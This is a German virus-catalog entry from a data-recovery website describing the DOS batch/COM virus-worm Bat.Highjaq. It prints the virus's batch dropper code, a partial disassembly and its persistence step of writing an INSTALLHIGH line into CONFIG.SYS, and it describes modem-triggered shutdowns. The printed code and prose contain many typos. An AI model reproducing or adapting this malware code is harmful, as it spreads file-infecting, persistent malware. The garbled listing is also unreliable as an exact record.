Datencrash Datenrettung Hardware Virus
Datencrash Datenrettung Festplatte Hardware Virus Datencrash Datenrettung Festplatte Hardware Virus
   Datenrettung
   News
   Datenretter
   Glossar
   Erste Hilfe
   Datenbackup
   Computer & Hardware
   News
   Glossar
   Viren & Trojaner
   Viren-Katalog
   AntiViren-Tools
   Hack-Angriffe
   Internes
   Startseite
   Partner
   Sitemap
   Unsere Banner
   Presseinfo
   Kontakt
   Impressum
Viren : Virenkatalog

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0-9

Bat.Highjaq


Bat.Highjaq ist ein Virus-Wurm, der sich in BAT Dateien und Hardware Driver Dateien aufhält, ist nicht gefährlich. Der Virus ist nicht Speicher-Resident
udn hat keinen TSR Code, um Dateien zu infizieren. Sobald ein Grätetreiber gestartet wird, wird auch der Vrius aktiv.
INT 21h gibt "AreYouGere?" aus.

Der Virus hat 2 Codeteile. Der erste Teil ist Text. Dies wird ausgeführt, wenn die BAT Datei gestarted wird.
Der zweite Teil ist binär. Dieser wird ausgeführt, wenn der Virus eine COM Datei oder einen Gerätetreiber infiziert.

Der Text Teil des Viruses:
::pFqD
@ctty nul
copy/b %0.bat+%0 c:\q.com
dir \*.arf/s/b|c:\q,com/i
:qlpj
if errorlevel 1 goto qWpU
ren c:\q.com UMKQYGWK.5KA
echo INSTALLHIGH=C:\UMKQYGWD.5KA>>c:\cinfig.sys
:qWpU
for %%a in /%0 %0.vat) do if exist %%a set q=%%a
del c:\q.com
ctty con
@del %q%

Wenn der Virus in einer BAT Datei ausgeführt kopiert er sich selbst nach "C:\Q.COM". Diese Datei wird dann "COM-dropper" gennant
und wird zum infizieren anderer Dateien benötigt. Um das Problem zu lösen, ab die zu infizierende Datei nur mit dem Dateinamen
oder mit dem ganzen Dateinamen gestartet wurde, führ der Virus folgenden Code aus:

COPY %0.BAT+%0

um den Dateicode zu kopieren.

Danach führt der Virus einen DIR Befehl durch die COMMAND.COM aus. Der Virus sucht ARJ Archive auf der Festplatte, um deren
Namen in die Q.com Datei. Die Q.com Datei liefert einen ErrorLevel, damit sich der TSR Code in den Speicher kopieren kann. Wenn
der Virus im System noch keinen Gerätetrieber infiziert hat (= Virus noch nicht in den Speicher geladen) bennent er die Q.com
in UMKQYGWK.5KA um und schreibt:

INSTALLHIGH=C:\UMKQYGWK.5KA

in die C:\CONFIG.SYS Datei. Darauf wird der Virus bei jeden Systemstart in den Speicher geladen (wie ein Gerätetreiber). Danach
löscht der Virus die Hauptdatei und die "C:\Q.com" Datei.

Wenn der Virus dann als COM Datei ausgeführt wird, bekommt er den namen der ARV Archive. Bei jedem Archiv wird nun der Virus
in Form eines Datenpaketes angehängt. Der Virus erhält nun den Namen "/WINSTART.BAT". Obwohl sich der Code nun in einem ARJ Archive
befindet, wird er absichtlich nicht verkleinert.

Der binäre Code des Viruses:

0100 3A 3A CMP BH, [BP+Si] ; text: ::pFqD
0102 70 46 JO Jmp_a
0104 71 44 JNO Jmp_a
.... . . . . .
0149 3A DB 3Ah ; text: :qlpj
014A Jmp_a:
014A 71 6C JNO Jmp_b
014C 70 4A JO Jmp_b
.... . . . . .
01B7 3A DB 3Ah ; text: :qWpU
01B8 Jmp_b:
01B8 71 57 JNO Main_Code
01BA 70 55 JO Main_Code
.... . . . . .
0211 Main_Code:
.... . . . . .

Die Text Zeichen werden vom Prozessor wie Assembler-Befehle interpretiert. Der binäre Code erkennt, ob er als Gerätetreiber,
oder als COM Datei ausgeführt wurde und schaltet zwischen zwei Routinen.

Wenn der Virus als Gerätetreiber ausgeführte, bleibt er nun speicher-resident. Der Virus kann nicht im Speicher bei den Gerätetreibern
resident bleiben, da er nicht die binären Eigenschaften eines Windows-Gerätetreibers besitzt (keine FFFFFFFFh Zeilen am Anfang).
Er bleibt aber im DOS Speicher aktiv.

Dann wird der Virus aktiv und beginnt das System zu überprüfen. Wenn die Windows Version nicht unter Windows 3.x ist, fährt der
Virus ein paar mal das System herunter. Danach gibt der Virus "AreYouHere?" und löscht die Datei-Attribute jeder Datei, die mit
"/W" beginnt. Es gibt keine richtige Begründung dafür, ausser dass der Virus sich selbst in dem ARJ Archive schützt (/WINSTART.BAT).

Wenn der Virus als COM Datei ohne Argumente oder als Gerätetreiber gestartet wird, sucht er den Haupt-Datei-Namen und setzt
dessen Attribute auf "Hidden" und "ReadOnly".

Der Virus kontrolliert auch die System-COM Dateien und liest Daten aus dem "Scratch Register" und dem "Line Status Register" aus jedem Prot.
Fallst der Virus den Wert "Q" aus dem "Scratch Register" zurückbekommt, dann startet er die "trigger routine". Wenn die Bits
"DataSetReady" und " ClearToSend" im "Line Status Register" gesetzt sind, dann schreibt der Virus die "Port number" in den DOS
Kernel an einer fixen Adresse. Es gibt wieder keine Begründung für diese Handlung.

Wenn die "trigger routine" gestartet wird, löscht diese den Bildschirm, initialisiert die Prots und schreibt:

ATL0M0A

in dem COM Port. Dann schaltet der Virus den Modem Lautprecher aus. Dann schreibt der Virus

HIGHJAQ on COMx:38400,N,8,1

in den COM Port.

COMx ist die Nummer des derade laufenden Prots. Danach führt der Virus die COMMAND.COM mit dem Befehl:
"C:\ COM1 /E:1024/P/F" aus.

Dieser Befehlt kontrolliert das "modem Carrier Detect bit" und fährt das System herunter.








Linktipps: Surf Stick